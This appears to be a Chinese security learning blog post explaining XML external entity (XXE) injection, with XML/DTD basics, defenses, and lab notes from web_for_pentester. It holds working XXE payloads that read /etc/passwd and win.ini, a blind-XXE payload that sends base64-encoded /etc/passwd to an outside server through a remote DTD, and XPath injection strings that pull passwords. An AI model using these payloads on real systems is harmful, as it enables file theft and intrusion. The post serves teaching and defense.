【XXE学习】XML外部实体注入

一、XML外部实体注入介绍

1.1 XXE简介

　　XML外部实体注入（XML External Entity Injection）也就是人们（mian shi guan ）常说的XXE啦，见名知意，就是对于不安全的外部实体进行处理时引发的安全漏洞

1.2 XXE可以做什么？

读取本地文件

端口探测

.....

只要权限够基本啥都能干了

1.3 XXE原理

XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。

xxe漏洞触发的点往往是可以上传XML文件约位置，没有对上传的XML文件进行过滤，导致可以上传恶意的XML文件。

二、XML基础知识

2.1 XML简介

　　XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。XML被设计为传输和存储数据，其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。

　　注意：要点：libxml2.9.1及以后，默认不解析外部实体。Linux中需要将libxml低于libxml2.9.1的版本编译到PHP中，可以使用phpinfo()查看libxml的版本信息。

下面看一个XML文档的实例：有点类似于HTML，具体细节可以参照w3cschool的文档查看。

2.2 DTD介绍

　　DTD：Document Type Definition 即文档类型定义，用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明)，也可以独立的放在一个文件中(外部引用)，由于其支持的数据类型有限，无法对元素或属性的内容进行详细规范，在可读性和可扩展性方面也比不上XML Schema。

2.3 使用DTD实体攻击的方式　　

　　下面再介绍一下实体（ENTITY）整个概念，如果需要在XML文档种频繁的使用某一条数据，我们可以预先给这个数据起一个别名，也就是一个ENTITY，之后再在文档种调用它。

　　DTD实体的引用有内部声明实体和外部引用实体的区别。按类型分则分为：内置实体，字符实体，通用实体，参数实体。

常见的在于参数实体和其他实体之间引用时的区别：　　

0x01 内部实体声明

格式为：

<!DOCTYPE  文件名 [

<!ENTITY  实体名 "实体内容">

]>

定义好的ENTITY在文档中通过“&实体名;”来使用。

例如：下面定义了一个name的实体，实体的值为Zh1z3ven，定义好了之后就可以在aaa这个文件内部通过&实体名;进行调用。

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE aaa[

<!ENTITY name "Zh1z3ven">

]>

<root>

<name>&name;</name>

上面展示的是一个内部DTD的声明，而外部的DTD实体则需要通过URL来远程调用一个.dtd文本文件，也或者可以利用file协议引用一个本地的文件；当然也支持其他的协议，不过不同的语言支持的协议不一样，可以参照下图。

0x02 外部实体调用

1.利用file协议：

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE aaa [

<!ENTITY name SYSTEM "file:///c:/windows/win.ini" >

]>

<name>&name;</name>

2.利用http协议：

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE aaa [

<!ENTITY name SYSTEM "http://127.0.0.1/123.txt" >

]>

<name>&name;</name>

3 参数实体+外部实体

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE a [

    <!ENTITY % name SYSTEM "http://127.0.0.1/123.txt">

    %name;

]>

例子：

XML内容：

大致逻辑是通过参数实体% name调用test.dtd之后在XML里调用dtd中的test实体来读取文件内容

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE a [

    <!ENTITY % name SYSTEM "http://127.0.0.1/test.dtd">

    %name;

]>

<d>&test;</d>

DTD(test.dtd)文件内容

结果：

三 XXE利用的几种姿势

1. 利用file协议读取本地文件（如etc/passwd）

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE aaa [

<!ENTITY name SYSTEM "file:///etc/passwd" >

]>

<name>&name;</name>

2.利用参数实体调用.dtd文件之后在XML里调用dtd中的声明的实体来读取文件内容

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE a [

    <!ENTITY % name SYSTEM "http://127.0.0.1/test.dtd">

    %name;

]>

<d>&test;</d>

test.dtd内容：

<!ENTITY test SYSTEM "file:///etc/passwd">

3.盲XXE思路：

（Orz这里还未自己验证，知识从网上搬运的，有环境的同学可以复现一下）

如果实战场景下XML没有回显，可以利用构造好的payload在读取存在XXE漏洞服务器文件的同时利用

php://filter将文件内容发送到攻击者服务器，那么访问服务器的web日志就可以看到此次攻击结果。

ps：首先这是一个file关键字的get参数传递，
php://是一种协议名称，php://filter/是一种访问本地文件的协议，
/read=convert.base64-encode/表示读取的方式是base64编码后，
resource=/etc/passwd表示目标文件为/etc/passwd。
这个php://filter据说经常来构造ThinkPHP的RCE漏洞 ---Orz :(

<!DOCTYPE a [

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">

<!ENTITY % dtd SYSTEM "http://www.hackersb.cn/attack.dtd">

%dtd;

%mydata;

]>

这里日志获取的内容记得base64解码就好，通过看日志或者wireshark抓包都可以看到

attack.dtd内容为

<!ENTITY % all

"<!ENTITY % mydata SYSTEM "http://www.hackersb.cn/?%file">"

>

4.其他思路

既然可以使用file 那么也可以用http来造成SSRF或者利用gopher协议当然也可以探测端口等等

基本啥都能干了

四关于XXE的防御

4.1 禁用外部实体

如PHP中的libxml_disable_entity_loader(true);

其他语言：

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

4.2 过滤用户提交的XML数据

如SYSTEM或者PUBLIC以及一些协议 file等

4.3 附上写本文的参考连接

https://security.tencent.com/index.php/blog/msg/69

https://www.hackersb.cn/hacker/211.html

php://filter妙用

php://filter在实战当中的奇技淫巧

https://www.freebuf.com/sectool/156863.html

https://www.hackersb.cn/hacker/211.html

https://thief.one/2017/06/20/1/

https://github.com/CHYbeta/Web-Security-Learning#xxe

（PS：下面是做web_for_pentester时XML注入的一些笔记懒得删了可以直接略过）

ENTITY实体：

如果在XML文档中需要频繁使用某一条数据，我们可以预先给这个数据起一个别名。即一个ENTITY，然后再在文档中调用它。

XML定义了两种类型的ENTITY，一种在XML文档中使用，另一种在为参数在DTD文件中使用。

ENTITY的定义语法：

<!DOCTYPE  文件名 [

<!ENTITY  实体名 "实体内容">

]>

定义好的ENTITY在文档中通过“&实体名;”来使用。

例如：定义一个name值为“Tom”，就可以在XML任何地方引用。

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE balabala [

<!ENTITY name "Tom" >

]>

<root>

<name>&name;</name>

</root>

正常来说，DTD分为内部DTD与外部DTD,内部DTD包含在XML文档中,外部DTD则通过URL引用.一个DTD文件是以.dtd结尾的文本文件。前面还要加上SYSTEM,但是如果此处没有任何过滤，我们完全可以引用系统敏感文件的，前提是页面有回显，否则你只引用了文件但不知道文件内容。

例如 Linux和Windows下的读取路径不一样

//Linux下读取/etc/passwd
<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE balabala [

<!ENTITY name SYSTEM "file:///etc/passwd" >

]>

<name>&name;</name>

//Windows下读取C:/windows/win.ini

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE balabala [

<!ENTITY name SYSTEM "file:///c:/windows/win.ini" >

]>

<name>&name;</name>

三、Example

Example1

下面先看一下后端代码：

<?php require_once("../header.php"); ?>

Hello

<?php

  $xml=simplexml_load_string($_GET['xml']);

  print_r((string)$xml);

?>

<?php require_once("../footer.php"); ?>

simplexml_load_string() 函数可以转换形式良好的XML字符串为SimpleXMLElement对象

print_r()可以把字符串和数字简单地打印出来，而数组则以括起来的键和值得列表形式显示，并以Array开头。但print_r()输出布尔值和NULL的结果没有意义，因为都是打印”\n”。因此用var_dump()函数更适合调试。打印关于变量的易于理解的信息,如果给出的是 string、integer 或 float，将打印变量值本身。如果给出的是 array，将会按照一定格式显示键和元素。object 与数组类似。记住，print_r() 将把数组的指针移到最后边。使用 reset() 可让指针回到开始处。

利用方法

先构造基本框架注意&name后要有；原文应该是笔误漏掉了。xml全部要写到一行里，构造好的语句需要进行URL编码

<!DOCTYPE xxx[<!ENTITY name "hacker">]><name>&name;</name>
//URL编码：
%3C!DOCTYPE%20xxx%5B%3C!ENTITY%20name%20%22hacker%22%3E%5D%3E%3Cname%3E%26name%3B%3C%2Fname%3

尝试读取本地文件/etc/passwd

<!DOCTYPE xxx[<!ENTITY name SYSTEM "file:///etc/passwd">]><name>&name;</name>

//URL编码：

%3C!DOCTYPE%20xxx%5B%3C!ENTITY%20name%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cname%3E%26name%3B%3C%2Fname%3E

Example2

后端代码：

<?php require_once("../header.php"); 

  $x = "<data><users><user><name>hacker</name><message>Hello hacker</message><password>pentesterlab</password></user><user><name>admin</name><message>Hello admin</message><password>s3cr3tP4ssw0rd</password></user></users></data>";

  $xml=simplexml_load_string($x);

  $xpath = "users/user/name[.='".$_GET['name']."']/parent::*/message";

  $res = ($xml->xpath($xpath));

  while(list( ,$node) = each($res)) {

      echo $node;

  }

?>

<?php require_once("../footer.php"); ?>

可以看到源代码先定义了一个$x变量，里面包含了一个xml。

然后把的 XML 字符串转换为 SimpleXMLElement 对象，并赋值给$res

然后查询了users里user里的name 值为$name的，并返回其所有父节点的message里面的值。

然后执行查询，最后while循环显示查询的值。

XPath介绍：

XPath 是一门在 XML 文档中查找信息的语言。XPath 可用来在 XML 文档中对元素和属性进行遍历。

XPath 是 W3C XSLT 标准的主要元素，并且 XQuery 和 XPointer 都构建于 XPath 表达之上。

因此，对 XPath 的理解是很多高级 XML 应用的基础。

XPath基本语法：

路径表达式         结果

bookstore         选取 bookstore 元素的所有子节点。

/bookstore         选取根元素 bookstore。

bookstore/book     选取属于 bookstore 的子元素的所有 book 元素。

//book             选取所有 book子元素，而不管它们在文档中的位置。

bookstore//book     选择属于 bookstore 元素的后代的所有 book 元素，而不管它们位于 bookstore 之下的什么位置。

//@lang             选取名为 lang 的所有属性。

/表示从XML文件中的根节点开始解析

//表示在XML文件中匹配已选择的当前节点，且不考虑其位置关系XPath Axes（轴）轴可以定义当前节点的节点集，下面列举了几个常用的。

ancestor            选取当前节点的所有先辈（父、祖父等）。

ancestor-or-self    选取当前节点的所有先辈（父、祖父等）以及当前节点本身。

attribute            选取当前节点的所有属性。

child                选取当前节点的所有子元素。

descendant            选取当前节点的所有后代元素（子、孙等）。

descendant-or-self    选取当前节点的所有后代元素（子、孙等）以及当前节点本身。

following            选取文档中当前节点的结束标签之后的所有节点。

namespace            选取当前节点的所有命名空间节点。

parent                选取当前节点的父节点。

了解了轴，再来了解一下步,下面举几个例子更便于了解:

child::book            选取所有属于当前节点的子元素的 book 节点。

attribute::lang        选取当前节点的 lang 属性。

child::*            选取当前节点的所有子元素。

attribute::*        选取当前节点的所有属性。

child::text()        选取当前节点的所有文本子节点。

child::node()        选取当前节点的所有子节点。

descendant::book    选取当前节点的所有 book 后代。

ancestor::book        选择当前节点的所有 book 先辈。

ancestor-or-self::book    选取当前节点的所有 book 先辈以及当前节点（如果此节点是 book 节点）

child::*/child::price    选取当前节点的所有 price 孙节点。

最后的最后，我们尝试构造，还是注入的思路，先尝试正确闭合，然后注释掉后面没用的。

?name=hacker' or 1=1]/parent::*/child::node()%00 
//%00注释掉后面的语句
// /parent::*/child::node()查看当前节点的所有父节点的子节点

?name=hacker' or 1=1]/parent::*/password%00